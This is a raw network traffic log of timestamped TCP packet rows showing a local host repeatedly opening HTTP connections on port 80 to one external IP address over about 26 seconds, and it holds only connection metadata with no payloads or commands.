Sep 27, 2024 00:20:15.621687889 CEST	80	49732	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:15.621746063 CEST	49732	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:15.626724005 CEST	80	49733	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:16.312407970 CEST	80	49733	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:16.312632084 CEST	49733	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:16.313494921 CEST	49733	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:16.319817066 CEST	80	49733	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:16.678626060 CEST	80	49733	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:16.678752899 CEST	49733	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:16.787580967 CEST	49733	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:16.788116932 CEST	49734	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:16.795715094 CEST	80	49733	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:16.795789003 CEST	49733	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:16.797032118 CEST	80	49734	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:16.797127008 CEST	49734	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:16.797324896 CEST	49734	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:16.804882050 CEST	80	49734	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:17.503345966 CEST	80	49734	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:17.503463030 CEST	49734	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:17.504219055 CEST	49734	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:17.512058020 CEST	80	49734	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:17.765189886 CEST	80	49734	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:17.765384912 CEST	49734	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:17.881020069 CEST	49734	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:17.881383896 CEST	49735	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:17.888614893 CEST	80	49735	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:17.888753891 CEST	49735	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:17.888835907 CEST	80	49734	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:17.888904095 CEST	49734	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:17.888951063 CEST	49735	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:17.895770073 CEST	80	49735	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:18.608196974 CEST	80	49735	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:18.608293056 CEST	49735	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:18.609127045 CEST	49735	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:18.614033937 CEST	80	49735	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:18.838968992 CEST	80	49735	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:18.839051962 CEST	49735	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:18.943654060 CEST	49735	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:18.944077015 CEST	49736	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:18.949189901 CEST	80	49735	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:18.949206114 CEST	80	49736	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:18.949249029 CEST	49735	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:18.949311972 CEST	49736	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:18.949496984 CEST	49736	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:18.954874992 CEST	80	49736	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:19.690799952 CEST	80	49736	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:19.690906048 CEST	49736	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:19.691633940 CEST	49736	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:19.700367928 CEST	80	49736	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:19.919317007 CEST	80	49736	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:19.919373035 CEST	49736	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:20.022074938 CEST	49736	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:20.022388935 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:20.030607939 CEST	80	49736	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:20.030659914 CEST	49736	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:20.030973911 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:20.031074047 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:20.031224012 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:20.038084030 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:20.777443886 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:20.777566910 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:20.778523922 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:20.787008047 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:21.021801949 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:21.021939039 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:21.136619091 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:21.137043953 CEST	49740	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:21.144177914 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:21.144296885 CEST	80	49740	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:21.144301891 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:21.144484043 CEST	49740	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:21.144756079 CEST	49740	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:21.151849985 CEST	80	49740	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:21.856066942 CEST	80	49740	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:21.856173038 CEST	49740	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:21.856957912 CEST	49740	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:21.863652945 CEST	80	49740	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:22.085535049 CEST	80	49740	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:22.085616112 CEST	49740	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:22.194252968 CEST	49740	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:22.194787025 CEST	49743	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:22.201564074 CEST	80	49743	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:22.201654911 CEST	49743	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:22.201776028 CEST	80	49740	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:22.201853037 CEST	49740	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:22.201955080 CEST	49743	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:22.209166050 CEST	80	49743	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:22.902400017 CEST	80	49743	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:22.902518988 CEST	49743	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:22.903342009 CEST	49743	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:22.910341024 CEST	80	49743	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:23.129972935 CEST	80	49743	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:23.130069971 CEST	49743	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:23.240906000 CEST	49743	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:23.241230011 CEST	49745	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:23.249946117 CEST	80	49743	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:23.249967098 CEST	80	49745	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:23.250015020 CEST	49743	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:23.250226021 CEST	49745	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:23.250250101 CEST	49745	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:23.257529020 CEST	80	49745	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:23.949552059 CEST	80	49745	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:23.952635050 CEST	49745	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:23.957696915 CEST	49745	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:23.963849068 CEST	80	49745	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:24.185142040 CEST	80	49745	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:24.185195923 CEST	49745	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:24.287674904 CEST	49745	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:24.288038015 CEST	49747	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:24.292788982 CEST	80	49745	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:24.292862892 CEST	80	49747	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:24.292882919 CEST	49745	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:24.292953014 CEST	49747	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:24.298501015 CEST	49747	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:24.303534031 CEST	80	49747	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:25.120635033 CEST	80	49747	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:25.120887995 CEST	49747	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:25.121757984 CEST	49747	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:25.128297091 CEST	80	49747	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:25.384674072 CEST	80	49747	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:25.384767056 CEST	49747	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:25.490537882 CEST	49747	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:25.490866899 CEST	49748	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:25.497543097 CEST	80	49747	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:25.497634888 CEST	49747	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:25.498254061 CEST	80	49748	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:25.498332024 CEST	49748	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:25.498446941 CEST	49748	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:25.505136013 CEST	80	49748	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:26.198019028 CEST	80	49748	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:26.198154926 CEST	49748	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:26.199155092 CEST	49748	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:26.208102942 CEST	80	49748	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:26.426377058 CEST	80	49748	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:26.426532030 CEST	49748	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:26.537688971 CEST	49748	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:26.538028955 CEST	49749	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:26.546267986 CEST	80	49749	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:26.546441078 CEST	49749	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:26.546650887 CEST	49749	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:26.553376913 CEST	80	49749	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:26.555263042 CEST	80	49748	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:26.555363894 CEST	49748	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:27.264488935 CEST	80	49749	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:27.264622927 CEST	49749	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:27.265553951 CEST	49749	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:27.270478010 CEST	80	49749	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:27.491336107 CEST	80	49749	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:27.491432905 CEST	49749	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:27.599970102 CEST	49749	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:27.600450039 CEST	49750	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:27.605415106 CEST	80	49750	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:27.605509043 CEST	80	49749	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:27.605555058 CEST	49750	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:27.605591059 CEST	49749	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:27.605814934 CEST	49750	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:27.610651016 CEST	80	49750	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:28.299740076 CEST	80	49750	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:28.299859047 CEST	49750	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:28.304115057 CEST	49750	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:28.309114933 CEST	80	49750	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:28.527620077 CEST	80	49750	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:28.527703047 CEST	49750	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:28.647063971 CEST	49750	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:28.647440910 CEST	49751	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:28.652857065 CEST	80	49751	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:28.652975082 CEST	49751	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:28.653076887 CEST	80	49750	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:28.653129101 CEST	49750	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:28.653286934 CEST	49751	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:28.659784079 CEST	80	49751	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:29.371143103 CEST	80	49751	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:29.371290922 CEST	49751	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:29.372488022 CEST	49751	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:29.382270098 CEST	80	49751	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:29.605664968 CEST	80	49751	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:29.605750084 CEST	49751	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:29.711560965 CEST	49751	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:29.711893082 CEST	49752	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:29.718054056 CEST	80	49751	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:29.718235970 CEST	49751	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:29.718923092 CEST	80	49752	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:29.718997002 CEST	49752	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:29.719175100 CEST	49752	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:29.724319935 CEST	80	49752	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:30.440591097 CEST	80	49752	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:30.440701008 CEST	49752	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:30.441497087 CEST	49752	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:30.450588942 CEST	80	49752	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:30.673533916 CEST	80	49752	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:30.673733950 CEST	49752	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:30.787357092 CEST	49752	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:30.787656069 CEST	49753	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:30.795664072 CEST	80	49752	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:30.795854092 CEST	49752	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:30.795887947 CEST	80	49753	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:30.795975924 CEST	49753	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:30.796148062 CEST	49753	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:30.804996967 CEST	80	49753	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:31.513525009 CEST	80	49753	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:31.513618946 CEST	49753	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:31.514511108 CEST	49753	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:31.521387100 CEST	80	49753	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:31.747541904 CEST	80	49753	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:31.747637987 CEST	49753	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:31.849939108 CEST	49753	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:31.850358963 CEST	49754	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:31.857527018 CEST	80	49753	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:31.857620001 CEST	49753	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:31.857857943 CEST	80	49754	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:31.857930899 CEST	49754	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:31.858158112 CEST	49754	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:31.866406918 CEST	80	49754	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:32.554923058 CEST	80	49754	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:32.555052996 CEST	49754	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:32.555843115 CEST	49754	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:32.562704086 CEST	80	49754	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:32.782084942 CEST	80	49754	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:32.782196045 CEST	49754	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:32.896672010 CEST	49754	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:32.897037983 CEST	49755	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:32.904273033 CEST	80	49755	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:32.904460907 CEST	49755	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:32.904556036 CEST	80	49754	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:32.904618979 CEST	49754	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:32.904999971 CEST	49755	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:32.912482977 CEST	80	49755	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:33.605915070 CEST	80	49755	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:33.605966091 CEST	49755	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:33.749284983 CEST	49755	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:33.756990910 CEST	80	49755	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:33.975999117 CEST	80	49755	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:33.976063967 CEST	49755	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:34.084297895 CEST	49755	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:34.084631920 CEST	49756	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:34.091739893 CEST	80	49755	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:34.091818094 CEST	49755	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:34.092005014 CEST	80	49756	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:34.092083931 CEST	49756	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:34.092222929 CEST	49756	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:34.099787951 CEST	80	49756	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:34.894733906 CEST	80	49756	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:34.894834042 CEST	49756	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:34.895554066 CEST	49756	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:34.900330067 CEST	80	49756	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:35.120089054 CEST	80	49756	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:35.120162010 CEST	49756	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:35.225106955 CEST	49756	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:35.225517035 CEST	49757	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:35.230374098 CEST	80	49756	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:35.230389118 CEST	80	49757	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:35.230417967 CEST	49756	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:35.230508089 CEST	49757	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:35.230693102 CEST	49757	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:35.235763073 CEST	80	49757	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:35.927007914 CEST	80	49757	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:35.927151918 CEST	49757	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:35.931111097 CEST	49757	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:35.937670946 CEST	80	49757	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:36.156299114 CEST	80	49757	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:36.156584024 CEST	49757	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:36.272025108 CEST	49757	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:36.272425890 CEST	49758	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:36.277710915 CEST	80	49758	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:36.277816057 CEST	49758	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:36.277964115 CEST	49758	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:36.278902054 CEST	80	49757	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:36.278951883 CEST	49757	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:36.282967091 CEST	80	49758	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:36.973047018 CEST	80	49758	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:36.973138094 CEST	49758	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:36.974416971 CEST	49758	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:36.981420994 CEST	80	49758	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:37.199002981 CEST	80	49758	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:37.199131966 CEST	49758	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:37.303016901 CEST	49758	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:37.303294897 CEST	49759	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:37.310040951 CEST	80	49758	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:37.310246944 CEST	49758	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:37.311368942 CEST	80	49759	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:37.311443090 CEST	49759	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:37.311707020 CEST	49759	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:37.318393946 CEST	80	49759	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:38.015285969 CEST	80	49759	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:38.015392065 CEST	49759	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:38.016035080 CEST	49759	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:38.022402048 CEST	80	49759	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:38.241451025 CEST	80	49759	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:38.241539955 CEST	49759	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:38.352155924 CEST	49759	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:38.352221966 CEST	49760	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:38.361290932 CEST	80	49760	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:38.361455917 CEST	80	49759	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:38.361504078 CEST	49760	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:38.361505032 CEST	49759	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:38.361660957 CEST	49760	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:38.369601965 CEST	80	49760	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:39.094549894 CEST	80	49760	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:39.094676971 CEST	49760	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:39.095506907 CEST	49760	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:39.100332022 CEST	80	49760	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:39.330702066 CEST	80	49760	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:39.330775023 CEST	49760	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:39.443525076 CEST	49760	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:39.443846941 CEST	49761	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:39.450217962 CEST	80	49761	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:39.450361967 CEST	49761	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:39.450514078 CEST	49761	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:39.450522900 CEST	80	49760	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:39.450634956 CEST	49760	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:39.457171917 CEST	80	49761	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:40.152733088 CEST	80	49761	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:40.152838945 CEST	49761	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:40.153729916 CEST	49761	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:40.159900904 CEST	80	49761	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:40.380983114 CEST	80	49761	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:40.381136894 CEST	49761	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:40.490648985 CEST	49761	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:40.490971088 CEST	49762	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:40.497224092 CEST	80	49761	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:40.497337103 CEST	49761	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:40.497421980 CEST	80	49762	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:40.497513056 CEST	49762	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:40.500627995 CEST	49762	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:40.506860018 CEST	80	49762	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:41.239897966 CEST	80	49762	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:41.239959002 CEST	49762	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:41.240827084 CEST	49762	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:41.246932030 CEST	80	49762	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:41.472112894 CEST	80	49762	185.215.113.16	192.168.2.4
Sep 27, 2024 00:20:41.472161055 CEST	49762	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:41.584538937 CEST	49762	80	192.168.2.4	185.215.113.16
Sep 27, 2024 00:20:41.585400105 CEST	49763	80	192.168.2.4	185.215.113.16
